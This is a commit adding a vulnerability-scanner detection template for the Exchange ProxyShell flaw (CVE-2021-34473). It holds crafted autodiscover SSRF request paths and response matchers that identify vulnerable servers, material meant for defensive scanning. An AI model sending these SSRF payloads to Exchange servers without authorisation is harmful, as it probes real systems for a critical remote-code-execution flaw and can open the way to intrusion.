Merge pull request #2370 from evait-security/master

add ProxyShell detection template
2021-08-12 22:08:59 +05:30 · 2021-08-12 22:08:59 +05:30 · a0275a9aeb
parent b69cd23cf4 36e43b66ec
commit a0275a9aeb
1 changed files with 27 additions and 0 deletions
--- a/cves/2021/CVE-2021-34473.yaml
+++ b/cves/2021/CVE-2021-34473.yaml
@ -0,0 +1,27 @@
+id: CVE-2021-34473
+
+info:
+  name: Exchange Server SSRF (ProxyShell)
+  author: arcc
+  severity: critical
+  description: |
+    Microsoft Exchange Server Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-31196, CVE-2021-31206.
+  reference: |
+        - https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34473
+        - https://www.youtube.com/watch?v=FC6iHw258RI
+        - https://portswigger.net/daily-swig/a-whole-new-attack-surface-researcher-orange-tsai-documents-proxylogon-exploits-against-microsoft-exchange-server
+  tags: cve,cve2021,ssrf,rce,exchange
+
+requests:
+  - method: GET
+    redirects: true
+    path:
+      - '{{BaseURL}}/autodiscover/autodiscover.json?@test.com/owa/?&Email=autodiscover/autodiscover.json%3F@test.com'
+      - '{{BaseURL}}/autodiscover/autodiscover.json?@test.com/mapi/nspi/?&Email=autodiscover/autodiscover.json%3F@test.com'
+
+    matchers:
+      - type: word
+        part: body
+        words:
+          - Microsoft.Exchange.Clients.Owa2.Server.Core.OwaADUserNotFoundException
+          - Exchange MAPI/HTTP Connectivity Endpoint